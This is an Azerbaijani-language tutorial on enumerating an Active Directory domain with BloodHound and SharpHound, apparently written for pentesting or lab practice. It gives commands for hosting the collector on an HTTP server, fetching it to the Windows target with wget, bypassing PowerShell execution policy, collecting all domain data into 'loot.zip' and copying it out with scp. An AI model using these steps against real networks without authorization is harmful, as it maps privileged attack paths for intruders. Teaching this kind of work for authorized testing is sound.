BloodHound ilə enumeration

BloodHound nədir?

BloodHound informasiya təhlükəsizliyi testi və təhlili üçün bir vasitədir. Xüsusilə Active Directory (AD) mühitində hücum səthlərini müəyyən etmək, giriş hüquqlarını təhlil etmək və təhlükəsizlik zəifliklərini aşkar etmək üçün istifadə olunur. BloodHound kəşf, təhlil və hesabat alətləri platformasıdır.

Bu alət AD mühitində əlaqə və giriş hüquqlarının xəritəsini yaradır, beləliklə, təhlükəsizlik ekspertləri və sistem administratorları potensial zəiflikləri aşkarlaya, imtiyazlı giriş yollarını müəyyən edə və təhlükəsizliklə bağlı riskləri təhlil edə bilərlər.

BloodHound yükləmək

Öz kali linux-a yükləyirik bloodhoundı bunun üçündə aşaqıdakı komudu işlədirik

apt-get install bloodhound

Bloodhoud konfiqurasiyası

Yüklədikdən sonra neo4j console əmrindən istifadə etməliyik və işlədikdən sonra bizə bir link verəcək.

O linkə daxil olduqda bizi giriş hissəsi qarşılayır username və şifrə varsayılan olaraq neo4j:neo4j olur həmişə.Girdikdən sonra öz şifrəmizi təyin edirik.

Növbəti mərhələdə terminala bloodHound əmrini yazıb və acılan pəncərədə təyin etdiyimiz şifrəni yazıb daxil oluruq.

beləliklə bloodhound yüklənməsi və konfiqurasiyası tamamlandı artıq növbəti mərhələyə kecə bilərik.

SharpHound.ps1

SharpHound, Active Directory (AD) mühitində kəşf etmək və BloodHound kimi alətlərlə istifadə etmək üçün hazırlanmış PowerShell skriptidir. BloodHound kimi əlaqə və giriş hüquqları xəritələri yaratmaq üçün nəzərdə tutulmuşdur.

SharpHound AD mühitində hədəflənmiş məlumatları toplayır və bu məlumatları BloodHound-a ötürmək üçün istifadə olunur. O, AD mühitində əlaqəli əlaqələri, istifadəçi hesablarını, qrup üzvlüklərini, giriş icazələrini, imtiyazlı giriş yollarını və oxşar məlumatları toplayır. Bu məlumat daha sonra BloodHound kimi analiz alətlərinə verilir və qrafik olaraq vizuallaşdırılır.

SharpHound.ps1 istifadəsi

SharpHound.ps1 sistemin özündə varsayılan olaraq olmur gərək onun üçün githab öz linuxsumuza yükləyirik.Sonra python serveri qaldırıq. wget ilə AD qoşulduqumuz komuterə yükləyirik.

python -m http.server 8088

wget əmri ilə qaldırdıqımız serverdən sharpHound.ps1 faylını windowsa cəkirik.

wget http://<IP>:8088/SharpHound.ps1

SharpHound.ps1 yüklədikdən sonra aşaqıdakı əmləri yazırıq:

powershell -ep bypass # Execution Policy bypass etmək üçün işlədilir
. .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName name.zip 
# -Domain: Domain adını təyin edirik
# -ZipFileName: bura isə yükləyəcəyi faylın adını yazırıq

Yüklədikdən sonra cmd acıb ağıdakı əmrləri yazırıq:

powershell -ep bypass 
. .\SharpHound.ps1 
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

Və bizə bir zip fayl verir.

İndi bu zip faylını öz sistemizə köcürməliyik bunun üçün scp istifadə edirik.

scp administrator@<IP>:<ZIP_FAYLININ_YERİ> <ZIP_FAYLINI_YÜKLƏYƏCƏYİ_YER>

BloodHounda daxil oluruq və sağda import graf dütməsinə basıb zip faylını secirik.

Qrafikləşdirilmiş şəbəkəyə baxmaq üçün menyunu açın və sorğuları seçin

Sorğular istəsəz yalnız adminləri göstərər

Və ya yüksək dəyərli hədəflərə aparan ən qısa yolar kimi mürəkkəb şeylərdə göstərər.

Last updated

Was this helpful?